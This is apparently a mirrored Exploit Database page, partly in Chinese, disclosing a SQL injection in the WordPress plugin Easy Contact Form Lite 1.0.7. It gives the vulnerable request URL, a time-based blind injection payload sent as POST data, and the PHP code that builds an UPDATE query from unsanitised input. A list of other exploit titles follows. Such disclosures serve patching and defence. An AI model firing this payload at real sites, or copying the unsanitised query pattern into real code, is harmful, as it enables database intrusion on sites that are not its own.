WordPress Plugin Easy Contact Form Lite 1.0.7 – SQL Injection

Exploit Database
13 阅读

作者： Miroslav Stampar

日期： 2011-08-17
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/17680/

# Exploit Title: WordPress Easy Contact Form Lite plugin <= 1.0.7 SQL Injection Vulnerability
# Date: 2011-08-17
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/easy-contact-form-lite.zip
# Version: 1.0.7 (tested)

---
PoC (POST data)
---
http://www.site.com/wp-content/plugins/easy-contact-form-lite/requests/sort_row.request.php
 field_num[]=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)

---------------
Vulnerable code
---------------
foreach ($_POST['field_num'] as $position=>$field_id) {
	
	if ($field_id > 0) {
		$query = "
			UPDATE $settings_table_name 
			SET position = '".$position."' 
			WHERE ID = $field_id";
		$wpdb->query($query);
	}

last Exploits
WordPress Plugin Easy Contact Form Lite 1.0.7 – SQL Injection的更多信息

Task Rabbit Clone 1.0 – ‘id’ SQL Injection：
Joomla! Component com_idoblog – SQL Injection：
TinyWebGallery 1.8.3 – Remote Command Execution：
Mara CMS 7.5 – Remote Code Execution (Authenticated)：
Data Center Audit 2.6.2 – Cross-Site Request Forgery (Update Admin)：
IF-CMS 2.07 – Local File Inclusion (Metasploit) (2)：
Zenoss Monitoring System 4.2.5-2108 (x64) – Persistent Cross-Site Scripting：
Joomla! Component com_acprojects – SQL Injection：